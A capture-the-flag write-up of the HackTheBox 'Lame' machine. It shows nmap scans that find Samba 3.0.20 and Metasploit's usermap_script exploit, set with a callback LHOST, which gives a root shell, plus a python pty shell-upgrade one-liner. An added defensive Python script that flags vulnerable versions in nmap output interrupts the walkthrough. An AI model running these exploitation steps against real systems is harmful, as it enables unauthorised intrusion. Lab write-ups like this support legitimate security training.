HackTheBox [Lame] WriteUp
- Difficulty: Easy
- Target: HackTheBox [Lame]
- Type: Comprehensive Penetration
GetShell
nmap 10.10.10.3 -sT -Pn --top-ports 1000
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Scanning the ports, I found the above ports open. Following the clues, I discovered that vsftpd 2.3.4 has a vulnerability with a smiley face, but it cannot be exploited.
I used nmap to further scan the Samba service.
nmap 10.10.10.3 -sT -sV -Pn -p 139,445 --script smb-os-discovery
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2025-05-07T04:36:46-04:00
Found the version number 3.0.20 and other information.
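The same version check can be run by a defender over their own scan results. The following is an added example, not part of the original write-up: it parses nmap -sV service lines and flags the two versions this write-up names, treating a version range such as "3.X - 4.X" as unresolved rather than safe. The WATCHLIST structure, the audit function, and the vsftpd and OpenSSH sample lines are constructed for illustration.

```python
import re

# Versions named in this write-up; extend from your own advisories (assumed structure).
WATCHLIST = {
    "vsftpd": {"2.3.4"},
    "samba": {"3.0.20"},
}

# Sample input: the two Samba lines are quoted from the scan above,
# the vsftpd and OpenSSH lines are constructed for this example.
SAMPLE = """\
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
"""

# port/proto, state, service name, then the free-form version banner
LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# First dotted numeric version in the banner, e.g. 3.0.20 out of 3.0.20-Debian
VERSION = re.compile(r"\b\d+(?:\.\d+){1,3}\b")

def audit(scan_text, watchlist=WATCHLIST):
    """Return (port, product, version, status) for every open watchlisted product."""
    findings = []
    for raw in scan_text.splitlines():
        m = LINE.match(raw.strip())
        if not m or m.group(3) != "open":
            continue
        port, banner = int(m.group(1)), m.group(5)
        for product, flagged in watchlist.items():
            if product not in banner.lower():
                continue
            v = VERSION.search(banner)
            if v is None:
                # nmap only reported a range; a closer fingerprint is needed
                findings.append((port, product, None, "unresolved"))
            elif v.group(0) in flagged:
                findings.append((port, product, v.group(0), "watchlisted"))
            else:
                findings.append((port, product, v.group(0), "ok"))
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```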
Used MSF to search for vulnerabilities.
msfconsole
search Samba 3.0.20
use multi/samba/usermap_script
set RHOSTS 10.10.10.3
set LHOST 10.10.14.45
The exploit was successful, and I used python to enter the shell.
python -c 'import pty;pty.spawn("/bin/bash")'
I found that I was already the root user and successfully obtained the flag.